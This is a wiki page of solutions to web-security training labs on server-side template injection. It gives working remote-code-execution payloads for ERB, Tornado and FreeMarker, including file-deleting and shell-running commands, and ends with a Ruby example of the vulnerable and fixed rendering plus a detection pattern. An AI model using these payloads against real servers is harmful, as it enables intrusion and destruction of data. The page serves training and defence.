
Server side template injection (SSTI)

Alnoman Kamil edited this page Feb 10, 2025 · 8 revisions

Practitioner lab:
Basic server-side template injection

  • Solution

    1. View products and notice that the first product displays the message "Unfortunately this product is out of stock."
    2. Notice also that the URL reflects that message: https://uuid.web-security-academy.net/?message=Unfortunately%20this%20product%20is%20out%20of%20stock.
    3. Since the lab description says it's an ERB template, payloads can be found in the HackTricks ERB (Ruby) section.
    4. After confirming with <%= 7*7 %>, which renders 49, RCE can be achieved by deleting the morale.txt file like so:
      https://uuid.web-security-academy.net/?message=<%= system("rm morale.txt") %>
      

Practitioner lab:
Basic server-side template injection (code context)

  • Solution

    1. Log in as wiener:peter.
    2. Use the "preferred name" functionality.
    3. Make a comment.
    4. Notice that the "preferred name" is reflected at https://uuid.web-security-academy.net/post?postId=<postnumber>.
    5. Modify the POST request to test for SSTI using Tornado syntax:
      blog-post-author-display: {{7*7}}

    6. RCE to delete morale.txt. (The payload was generated by ChatGPT via the Bug Hunter plugin.)
      {{__import__('os').popen('rm morale.txt').read()}}
      
  • Solution

    1. Log in with the lab credentials.
    2. Modify a post.
    3. Generate an error and take note of the framework used (in this case "freemarker").
    4. Use HackTricks for FreeMarker to craft a payload.
    5. Payload:
      <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("ls")}
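All three labs share one root cause: user input (the `message` parameter, the preferred name, the post body) is used as template *source* instead of template *data*. The following is an added example written for this page, not the labs' server code: a constructed Ruby/ERB stand-in for the first lab's banner, showing the vulnerable pattern beside the fixed one, plus a small detection check for the ERB, Tornado and FreeMarker delimiters used above. The function names and the regex are assumptions of this example.

```ruby
require 'erb'
require 'cgi'

# Constructed stand-in for the "out of stock" banner (not the lab's own code).
# VULNERABLE: the user-controlled message is spliced into the template source,
# so any ERB tags it contains (e.g. <%= 7*7 %>) are evaluated by the server.
def render_message_vulnerable(message)
  ERB.new("<p>#{message}</p>").result(binding)
end

# FIXED: the template text is a fixed string and the message is handed in as
# data. ERB never sees the user's text as code, and escapeHTML stops it from
# becoming markup in the page.
SAFE_TEMPLATE = ERB.new('<p><%= CGI.escapeHTML(message) %></p>')

def render_message_safe(message)
  SAFE_TEMPLATE.result_with_hash(message: message)
end

# Detection hook (assumed pattern, not from the labs): delimiters of the engines
# this page covers - ERB <% %>, Tornado {{ }}, FreeMarker ${ } and <# >.
# Suitable for a WAF rule or log alert on parameters such as `message` or the
# preferred-name field; it complements the fix above, it does not replace it.
TEMPLATE_PROBE = /<%=?|\{\{|\$\{|<#/

def template_probe?(value)
  !(value =~ TEMPLATE_PROBE).nil?
end

if __FILE__ == $PROGRAM_NAME
  probe = '<%= 7*7 %>'                   # the same harmless check used in the lab
  puts render_message_vulnerable(probe) # => <p>49</p>   (input was executed)
  puts render_message_safe(probe)       # => <p>&lt;%= 7*7 %&gt;</p> (input shown as text)
  puts template_probe?(probe)           # => true
end
```

The `49` versus the escaped literal is exactly the difference the labs' `7*7` probe detects; a response that renders the arithmetic means the input reached the template compiler.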
      